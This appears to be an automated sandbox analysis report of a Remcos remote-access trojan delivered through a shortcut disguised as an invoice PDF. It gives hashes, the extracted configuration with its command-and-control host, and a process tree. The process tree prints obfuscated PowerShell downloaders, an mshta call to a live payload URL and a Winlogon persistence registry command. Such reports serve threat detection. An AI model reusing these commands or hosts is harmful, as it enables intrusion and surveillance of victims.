Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    17-08-2022 07:11

General

  • Target

    FACTURAS VENCIDAS.pdf.lnk

  • Size

    4KB

  • MD5

    321240e769016fa53af40cb6ab98cc0d

  • SHA1

    44b6143d5ec750d11f38d311622ef849b8ec5178

  • SHA256

    517b9d73ba6d6fd29ef0e008a01b11487c9217e466e17bb073a05412b3932e5b

  • SHA512

    b8189176905d269d0135267ac47ac30f140ab76cb8ae5025250691f99f6b8ae186d05bad3bee3521726d6dc4f14f25cca3235aebcd9a9f56c8b8e93eb52e86dd

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

https://movilidadvialcolombia.com/envios.hta

Extracted

Family

remcos

Botnet

ENVIOJAGOSTO 16

C2

logisitica.discisoted.info:5505

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    true

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    fryuias

  • mouse_option

    false

  • mutex

    yyuhajsstr-SGRMTP

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • startup_value

    Remcos

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Blocklisted process makes network request 4 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 4 IoCs
  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 47 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\FACTURAS VENCIDAS.pdf.lnk"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2176
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $RmOQa='oaaviioo.ai:loavstm.nl/daoMcbHhemdihvpTlmttslsc//i'; &(-join($RmOQa[(25567-25551),(-5690+5691),(-53183+53195)])) :\ (-join($RmOQa[(25567-25551),(-5690+5691),(-53183+53195)])); :\ ^* (-join($RmOQa[(-49742+49760),(25567-25551),(-65481+65510),(-31827+31844),(-5690+5691)])); foreach($bxcdxk in @((-7238+7268),(15062-15045),(12459-12442),(60614-60577),(-27262+27278),(-16356+16367),(-59583+59605),(-38422+38444),(4418-4400),(-45458+45458),(-8330+8333),(53548-53544),(31137-31125),(-32813+32817),(10370-10347),(2734-2733),(32919-32896),(-55404+55407),(25253-25249),(-60232+60233),(-22204+22216),(-3617+3644),(-25191+25191),(16991-16979),(-56149+56149),(-64411+64429),(-33829+33857),(25970-25966),(-29913+29914),(28759-28751),(-21336+21363),(29847-29847),(16247-16229),(-50154+50176),(-35833+35864),(-60816+60836),(54974-54971),(-1453+1457),(21056-21056),(30922-30906),(25154-25146),(39267-39237),(54694-54677),(-5241+5242))) {$nxFNKh+= $RmOQa[$bxcdxk]}; ^* $nxFNKh;
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4388
      • C:\Windows\system32\mshta.exe
        "C:\Windows\system32\mshta.exe" https://movilidadvialcolombia.com/envios.hta
        3⤵
        • Blocklisted process makes network request
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:5076
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function QFoo($wTJMjo, $MhKJTz){[IO.File]::WriteAllBytes($wTJMjo, $MhKJTz)};function oWVxzCgn($wTJMjo){if($wTJMjo.EndsWith((TKBlbKosjn @(40128,40182,40190,40190))) -eq $True){rundll32.exe $wTJMjo }elseif($wTJMjo.EndsWith((TKBlbKosjn @(40128,40194,40197,40131))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $wTJMjo}else{Start-Process $wTJMjo}};function TEoNadtoqIADiJtREz($QFoo){$ePgOrIoohIZip=(TKBlbKosjn @(40154,40187,40182,40182,40183,40192));$NvFKRrCmYzte=(Get-ChildItem $QFoo -Force);$NvFKRrCmYzte.Attributes=$NvFKRrCmYzte.Attributes -bor ([IO.FileAttributes]$ePgOrIoohIZip).value__};function LRhURdeLXaoFREK($RhhiytOYBUlRYkYz){$UxWyBRTErTofGy = New-Object (TKBlbKosjn @(40160,40183,40198,40128,40169,40183,40180,40149,40190,40187,40183,40192,40198));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$MhKJTz = $UxWyBRTErTofGy.DownloadData($RhhiytOYBUlRYkYz);return $MhKJTz};function TKBlbKosjn($OtwbKcGJk){$twsgAgLF=40082;$ayaUHuGIzOdqfFj=$Null;foreach($SDGrVxav in $OtwbKcGJk){$ayaUHuGIzOdqfFj+=[char]($SDGrVxav-$twsgAgLF)};return $ayaUHuGIzOdqfFj};function sKNdBIlT(){$XfNNgfeGyqSKOd = $env:AppData + '\';$xLoEtvLekWTSlcQ = $XfNNgfeGyqSKOd + 'RE3ByzZ?ver=f85f&q=90&m=2&h=768&w=1024&b=%23FFFFFFFF&aim=true';If(Test-Path -Path $xLoEtvLekWTSlcQ){Invoke-Item $xLoEtvLekWTSlcQ;}Else{ $FNdxUMhlTwTXIn = LRhURdeLXaoFREK (TKBlbKosjn @(40186,40198,40198,40194,40197,40140,40129,40129,40187,40191,40185,40127,40194,40196,40193,40182,40127,40181,40191,40197,40127,40196,40198,40127,40191,40187,40181,40196,40193,40197,40193,40184,40198,40127,40181,40193,40191,40128,40179,40189,40179,40191,40179,40187,40204,40183,40182,40128,40192,40183,40198,40129,40181,40191,40197,40129,40179,40194,40187,40129,40179,40191,40129,40187,40191,40179,40185,40183,40152,40187,40190,40183,40150,40179,40198,40179,40129,40164,40151,40133,40148,40203,40204,40172,40145,40200,40183,40196,40143,40184,40138,40135,40184,40120,40195,40143,40139,40130,40120,40191,40143,40132,40120,40186,40143,40137,40136,40138,40120,40201,40143,40131,40130,40132,40134,40120,40180,40143,40119,40132,40133,40152,40152,40152,40152,40152,40152,40152,40152,40120,40179,40187,40191,40143,40198,40196,40199,40183));QFoo $xLoEtvLekWTSlcQ $FNdxUMhlTwTXIn;Invoke-Item $xLoEtvLekWTSlcQ;};$Cguc = $XfNNgfeGyqSKOd + 'envioa16.exe'; if (Test-Path -Path $Cguc){oWVxzCgn $Cguc;}Else{ $JkgHoE = LRhURdeLXaoFREK (TKBlbKosjn @(40186,40198,40198,40194,40197,40140,40129,40129,40191,40193,40200,40187,40190,40187,40182,40179,40182,40200,40187,40179,40190,40181,40193,40190,40193,40191,40180,40187,40179,40128,40181,40193,40191,40129,40183,40192,40200,40187,40193,40179,40131,40136,40128,40183,40202,40183));QFoo $Cguc $JkgHoE;oWVxzCgn $Cguc;};TEoNadtoqIADiJtREz $Cguc;;;;;}sKNdBIlT;
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4548
          • C:\Users\Admin\AppData\Roaming\envioa16.exe
            "C:\Users\Admin\AppData\Roaming\envioa16.exe"
            5⤵
            • Executes dropped EXE
            • Checks computer location settings
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:416
            • C:\Windows\SysWOW64\cmd.exe
              "cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\AppData\Roaming\edge.exe,"
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:2608
              • C:\Windows\SysWOW64\reg.exe
                REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\AppData\Roaming\edge.exe,"
                7⤵
                • Modifies WinLogon for persistence
                PID:1072
            • C:\Users\Admin\AppData\Roaming\edge.exe
              "C:\Users\Admin\AppData\Roaming\edge.exe"
              6⤵
              • Executes dropped EXE
              • Checks computer location settings
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:3764
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                7⤵
                  PID:4528
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                  7⤵
                    PID:4788
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                    7⤵
                      PID:4356
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                      7⤵
                      • Suspicious use of SetWindowsHookEx
                      PID:544
                    • C:\Users\Admin\AppData\Local\Temp\process.exe
                      "C:\Users\Admin\AppData\Local\Temp\process.exe"
                      7⤵
                      • Executes dropped EXE
                      • Checks computer location settings
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2200
                      • C:\Users\Admin\AppData\Local\Temp\process.exe
                        "C:\Users\Admin\AppData\Local\Temp\process.exe"
                        8⤵
                        • Executes dropped EXE
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2952

        Network

        MITRE ATT&CK Matrix ATT&CK v6

        Persistence

        Winlogon Helper DLL

        1
        T1004

        Defense Evasion

        Modify Registry

        1
        T1112

        Discovery

        Query Registry

        1
        T1012

        System Information Discovery

        2
        T1082

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
          Filesize

          2KB

          MD5

          2f57fde6b33e89a63cf0dfdd6e60a351

          SHA1

          445bf1b07223a04f8a159581a3d37d630273010f

          SHA256

          3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

          SHA512

          42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\process.exe.log
          Filesize

          1KB

          MD5

          7dca233df92b3884663fa5a40db8d49c

          SHA1

          208b8f27b708c4e06ac37f974471cc7b29c29b60

          SHA256

          90c83311e35da0b5f8aa65aa2109745feb68ee9540e863f4ed909872e9c6a84c

          SHA512

          d134b96fd33c79c85407608f76afc5a9f937bff453b1c90727a3ed992006c7d4c8329be6a2b5ba6b11da1a32f7cd60e9bc380be388b586d6cd5c2e6b1f57bd07

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          93cb4762051c76ef612cb1d1d3d2239b

          SHA1

          422e15da3533916c8c202f10419ae256d3294b98

          SHA256

          2a71d735c4783ea63445e7a9edbed8d284dd0127a97419e7274aac2c14bfe6c1

          SHA512

          dd125954450fcd5eb4804852478b8d2356c60ad03441996aff0163b293fe5f40d3cf5c3130690896c0cf12d7f48c3d36a0bbed5a996413d4672a706a83852b34

        • C:\Users\Admin\AppData\Local\Temp\process.exe
          Filesize

          76KB

          MD5

          0e362e7005823d0bec3719b902ed6d62

          SHA1

          590d860b909804349e0cdc2f1662b37bd62f7463

          SHA256

          2d0dc6216f613ac7551a7e70a798c22aee8eb9819428b1357e2b8c73bef905ad

          SHA512

          518991b68496b3f8545e418cf9b345e0791e09cc20d177b8aa47e0aba447aa55383c64f5bdaca39f2b061a5d08c16f2ad484af8a9f238ca23ab081618fba3ad3

        • C:\Users\Admin\AppData\Local\Temp\process.exe
          Filesize

          76KB

          MD5

          0e362e7005823d0bec3719b902ed6d62

          SHA1

          590d860b909804349e0cdc2f1662b37bd62f7463

          SHA256

          2d0dc6216f613ac7551a7e70a798c22aee8eb9819428b1357e2b8c73bef905ad

          SHA512

          518991b68496b3f8545e418cf9b345e0791e09cc20d177b8aa47e0aba447aa55383c64f5bdaca39f2b061a5d08c16f2ad484af8a9f238ca23ab081618fba3ad3

        • C:\Users\Admin\AppData\Local\Temp\process.exe
          Filesize

          76KB

          MD5

          0e362e7005823d0bec3719b902ed6d62

          SHA1

          590d860b909804349e0cdc2f1662b37bd62f7463

          SHA256

          2d0dc6216f613ac7551a7e70a798c22aee8eb9819428b1357e2b8c73bef905ad

          SHA512

          518991b68496b3f8545e418cf9b345e0791e09cc20d177b8aa47e0aba447aa55383c64f5bdaca39f2b061a5d08c16f2ad484af8a9f238ca23ab081618fba3ad3

        • C:\Users\Admin\AppData\Local\Temp\process.txt
          Filesize

          50B

          MD5

          97698d1d1a7cd4322000042f83794351

          SHA1

          37f69ed5392d6f4bf503f83b2752e40a97d35f14

          SHA256

          606e02e6e908a5cfcc58233073528509297238fc071212d01a0b05935851b12c

          SHA512

          9415d7227431231c6a400f857c2e873562da761e2413d2b155537d1d2cf5752c1c885bd3a406c8adbf6cc43014896015bc6b458371a474d15dd2c9a77442560f

        • C:\Users\Admin\AppData\Local\Temp\process.txt
          Filesize

          53B

          MD5

          0db3c08c67e1da482a0aade89f0df811

          SHA1

          d3b3426f1740361b0935438e7879f3bfdaff5bf1

          SHA256

          fd7e17eaca703972ae537099ae7571014c61d94083151398ae2b966a99b5f932

          SHA512

          195b0f965f94ca80d8541a3939c1bbfd37f280308a13e97691c2863939244e1686924b3696542a401401a3e9d855c065f33e7631a55fce0b6c64e4805d9d8019

        • C:\Users\Admin\AppData\Local\Temp\process.txt
          Filesize

          53B

          MD5

          0db3c08c67e1da482a0aade89f0df811

          SHA1

          d3b3426f1740361b0935438e7879f3bfdaff5bf1

          SHA256

          fd7e17eaca703972ae537099ae7571014c61d94083151398ae2b966a99b5f932

          SHA512

          195b0f965f94ca80d8541a3939c1bbfd37f280308a13e97691c2863939244e1686924b3696542a401401a3e9d855c065f33e7631a55fce0b6c64e4805d9d8019

        • C:\Users\Admin\AppData\Roaming\edge.exe
          Filesize

          970KB

          MD5

          3f146204fb84a87777b40595b188b6bb

          SHA1

          b9d03c4eed64760a4bfc10b5112bdf47f2c6fb07

          SHA256

          d851906c3ef55826aa9f3ef0b30df65a77161fa710067d6f2c5479fe7f60e269

          SHA512

          1c2f7af172e814b82d1712eb5313c2cda1d7d92ee59fb70793c94697f8f29686182d3f87d0bc1a66e25912316c4ea936620cdd0f429fadd0c2a661421f55d9b5

        • C:\Users\Admin\AppData\Roaming\edge.exe
          Filesize

          970KB

          MD5

          3f146204fb84a87777b40595b188b6bb

          SHA1

          b9d03c4eed64760a4bfc10b5112bdf47f2c6fb07

          SHA256

          d851906c3ef55826aa9f3ef0b30df65a77161fa710067d6f2c5479fe7f60e269

          SHA512

          1c2f7af172e814b82d1712eb5313c2cda1d7d92ee59fb70793c94697f8f29686182d3f87d0bc1a66e25912316c4ea936620cdd0f429fadd0c2a661421f55d9b5

        • C:\Users\Admin\AppData\Roaming\envioa16.exe
          Filesize

          970KB

          MD5

          3f146204fb84a87777b40595b188b6bb

          SHA1

          b9d03c4eed64760a4bfc10b5112bdf47f2c6fb07

          SHA256

          d851906c3ef55826aa9f3ef0b30df65a77161fa710067d6f2c5479fe7f60e269

          SHA512

          1c2f7af172e814b82d1712eb5313c2cda1d7d92ee59fb70793c94697f8f29686182d3f87d0bc1a66e25912316c4ea936620cdd0f429fadd0c2a661421f55d9b5

        • C:\Users\Admin\AppData\Roaming\envioa16.exe
          Filesize

          970KB

          MD5

          3f146204fb84a87777b40595b188b6bb

          SHA1

          b9d03c4eed64760a4bfc10b5112bdf47f2c6fb07

          SHA256

          d851906c3ef55826aa9f3ef0b30df65a77161fa710067d6f2c5479fe7f60e269

          SHA512

          1c2f7af172e814b82d1712eb5313c2cda1d7d92ee59fb70793c94697f8f29686182d3f87d0bc1a66e25912316c4ea936620cdd0f429fadd0c2a661421f55d9b5

        • memory/416-146-0x0000000000E30000-0x0000000000F2A000-memory.dmp
          Filesize

          1000KB

        • memory/416-147-0x00000000057B0000-0x000000000584C000-memory.dmp
          Filesize

          624KB

        • memory/416-148-0x0000000016F50000-0x00000000174F4000-memory.dmp
          Filesize

          5.6MB

        • memory/416-149-0x0000000006750000-0x00000000067E2000-memory.dmp
          Filesize

          584KB

        • memory/416-150-0x0000000006720000-0x000000000672A000-memory.dmp
          Filesize

          40KB

        • memory/416-151-0x0000000019200000-0x0000000019266000-memory.dmp
          Filesize

          408KB

        • memory/416-152-0x00000000196D0000-0x0000000019892000-memory.dmp
          Filesize

          1.8MB

        • memory/416-153-0x0000000019DD0000-0x000000001A2FC000-memory.dmp
          Filesize

          5.2MB

        • memory/416-154-0x0000000019A60000-0x0000000019A82000-memory.dmp
          Filesize

          136KB

        • memory/416-142-0x0000000000000000-mapping.dmp
        • memory/544-166-0x0000000000400000-0x000000000047B000-memory.dmp
          Filesize

          492KB

        • memory/544-164-0x0000000000000000-mapping.dmp
        • memory/544-179-0x0000000000400000-0x000000000047B000-memory.dmp
          Filesize

          492KB

        • memory/544-168-0x0000000000400000-0x000000000047B000-memory.dmp
          Filesize

          492KB

        • memory/544-167-0x0000000000400000-0x000000000047B000-memory.dmp
          Filesize

          492KB

        • memory/544-165-0x0000000000400000-0x000000000047B000-memory.dmp
          Filesize

          492KB

        • memory/1072-156-0x0000000000000000-mapping.dmp
        • memory/2200-172-0x0000000000DC0000-0x0000000000DDA000-memory.dmp
          Filesize

          104KB

        • memory/2200-169-0x0000000000000000-mapping.dmp
        • memory/2608-155-0x0000000000000000-mapping.dmp
        • memory/2952-174-0x0000000000000000-mapping.dmp
        • memory/3764-157-0x0000000000000000-mapping.dmp
        • memory/3764-160-0x00000000002B0000-0x00000000003AA000-memory.dmp
          Filesize

          1000KB

        • memory/4356-163-0x0000000000000000-mapping.dmp
        • memory/4388-136-0x00007FFF3CA10000-0x00007FFF3D4D1000-memory.dmp
          Filesize

          10.8MB

        • memory/4388-132-0x0000000000000000-mapping.dmp
        • memory/4388-134-0x00007FFF3CA10000-0x00007FFF3D4D1000-memory.dmp
          Filesize

          10.8MB

        • memory/4388-133-0x00000297D1600000-0x00000297D1622000-memory.dmp
          Filesize

          136KB

        • memory/4528-161-0x0000000000000000-mapping.dmp
        • memory/4548-145-0x00007FFF3C200000-0x00007FFF3CCC1000-memory.dmp
          Filesize

          10.8MB

        • memory/4548-141-0x00007FFF3C200000-0x00007FFF3CCC1000-memory.dmp
          Filesize

          10.8MB

        • memory/4548-138-0x0000000000000000-mapping.dmp
        • memory/4788-162-0x0000000000000000-mapping.dmp
        • memory/5076-135-0x0000000000000000-mapping.dmp